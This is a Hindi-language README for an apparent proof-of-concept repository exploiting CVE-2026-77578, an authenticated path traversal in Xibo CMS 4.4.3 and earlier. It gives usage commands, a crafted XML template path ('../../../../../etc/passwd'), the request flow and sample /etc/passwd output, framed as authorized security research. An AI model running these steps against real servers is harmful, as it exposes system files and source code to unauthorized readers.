
Python प्रूफ-ऑफ-कॉन्सेप्ट जो CVE-2026-77578 का उपयोग करता है, जो Xibo CMS में एक प्रमाणित पाथ ट्रैवर्सल है जो तैयार किए गए XML टेम्पलेट आयात के माध्यम से मनमानी स्थानीय फ़ाइलों को पढ़ता है।
CVE-2026-77578, Xibo CMS में एक प्रमाणित मनमाना स्थानीय फ़ाइल पठन (Arbitrary Local File Read) भेद्यता है।
Admin विशेषाधिकार या Module Templates पहुँच वाला एक प्रमाणित उपयोगकर्ता एक तैयार किए गए XML टेम्पलेट को आयात कर सकता है जिसमें ट्रैवर्सल अनुक्रम के साथ पथ-आधारित एसेट होता है। परिणामी एसेट को फिर मॉड्यूल एसेट एंडपॉइंट के माध्यम से एक्सेस किया जा सकता है, जिससे Xibo संदर्भित स्थानीय फ़ाइल की सामग्री लौटा देता है।
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)Xibo ने भेद्यता को GHSA-pc3g-2hhm-46qc के रूप में प्रकाशित किया, जिसमें पुष्टि की गई कि संस्करण <= 4.4.3 प्रभावित हैं और >= 4.4.4 पैच किए गए हैं। सलाह उच्च गंभीरता के साथ CVSS v3.1 स्कोर 8.8 प्रदान करती है और CVE-2026-77578 की पहचान करती है।
प्रदान किया गया Python PoC शोषण प्रक्रिया को स्वचालित करता है:
/developer/template/import के माध्यम से एक तैयार किया गया XML टेम्पलेट अपलोड करता है।/module/asset/<asset-id> के माध्यम से परिणामी एसेट का अनुरोध करता है।python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
उदाहरण:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
एक और उदाहरण:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
-f विकल्प डिफ़ॉल्ट रूप से /etc/passwd पर सेट होता है।
निम्नलिखित /etc/passwd की सफल पुनर्प्राप्ति प्रदर्शित करता है:
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
भेद्यता को स्थानीय Xibo CMS 4.4.3 परीक्षण वातावरण में कई फ़ाइलों के विरुद्ध सफलतापूर्वक सत्यापित किया गया, जिनमें शामिल हैं:
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpPHP स्रोत फ़ाइल परीक्षण दर्शाता है कि यह समस्या केवल सिस्टम मेटाडेटा ही नहीं, बल्कि एप्लिकेशन स्रोत कोड लौटाने में भी सक्षम है।
सफल शोषण आवश्यक Module Templates विशेषाधिकारों वाले एक प्रमाणित हमलावर को Xibo एप्लिकेशन प्रक्रिया द्वारा सुलभ मनमानी फ़ाइलों को पढ़ने की अनुमति देता है।
परिनियोजन के आधार पर, यह निम्नलिखित को उजागर कर सकता है:
यह प्रूफ ऑफ कॉन्सेप्ट केवल अधिकृत सुरक्षा अनुसंधान और रक्षात्मक परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
केवल उन सिस्टमों का परीक्षण करें जिनके आप स्वामी हैं या जिनका मूल्यांकन करने के लिए आपके पास स्पष्ट अनुमति है।
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png